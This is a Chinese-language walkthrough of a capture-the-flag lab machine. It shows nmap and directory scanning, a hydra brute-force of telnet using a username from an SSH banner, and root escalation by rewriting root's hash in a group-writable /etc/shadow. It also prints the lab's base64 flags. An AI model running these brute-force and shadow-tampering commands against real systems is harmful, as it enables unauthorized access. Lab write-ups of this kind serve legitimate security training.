主机发现
sudo以系统管理身份执行扫描-l列出本地存活ip
sudo arp-scan -l
靶机ip:192.168.179.150
ip a:显示本地主机配置信息
主机ip:192.168.179.230
sudo nmap 192.168.179.150
开放端口
22/tcp open ssh:SSH 是一种安全的远程登录方式,支持加密通信和多种身份验证方式。 23/tcp open telnet:是一种古老的远程登录协议,用于访问远程系统, Telnet 是不安全的,因为它以明文形式传输数据(包括用户名和密码),容易被网络监听和攻击。
80/tcp open http:web网络服务 。
信息收集
访问web页面
并没有什么内容可以访问,看看是否有其他目录及文件信息。
目录爆破
以管理员身份使用dirsearch工具进行扫描 -u 指定目标靶机ip地址 -w 指定一个字典进行爆破。
sudo dirsearch -u 192.168.179.150 -w /usr/share/wordlists/dirb/common.txt
好像没有扫出什么东西,换gobuster目录爆破工具试试
扫了半天也是一点东西没有,基本可以判断没有其他目录或文件,80端口是没有什么信息了
测试ssh登录连接
登录ssh,弹出一个banner图,里面显示了一个用户名(如果在web服务找不到其他信息,可以来ssh看看,这里就是一个很有用的提示信息)
hydra爆破
sudo hydra -l b.taylor -P /usr/share/wordlists/rockyou.txt telnet://192.168.179.150 -V -I
以系统用户权限使用hydra工具指定参数 -l:用户名 -P:字典路径 爆破telnet服务的靶机IP(因为这个服务是不安全的,所以容易扫出来)
用户名:b.taylor
密码:rockyou
user
ZWRjOWY1YzU1YWY4NzUwNTAzM2EyMGRkNDE5MzEzNjQK
shadow提权
发现这个用户附加了shadow组
可以查看一下权限
b.taylor@lower2:~$ ls -al /etc/shadow
-rw-rw---- 1 root shadow 749 feb 16 07:10 /etc/shadow
shadow具有可读可修改的权限
那么我们可以直接修改root的密码
nano /etc/shadow
nano编辑器:Ctrl+O保存 Ctrl+X退出
红框这一段是密码的加密,删除它,添加新的。
openssl生成加密
openssl passwd 123456
$1$miicX4Wg$beeb2JZffTvaMWFnGDOuX/
root
MjM1YWE5MGI2ODhiNzExYTg3ZDVkMTVjNmUzNGRhZGEK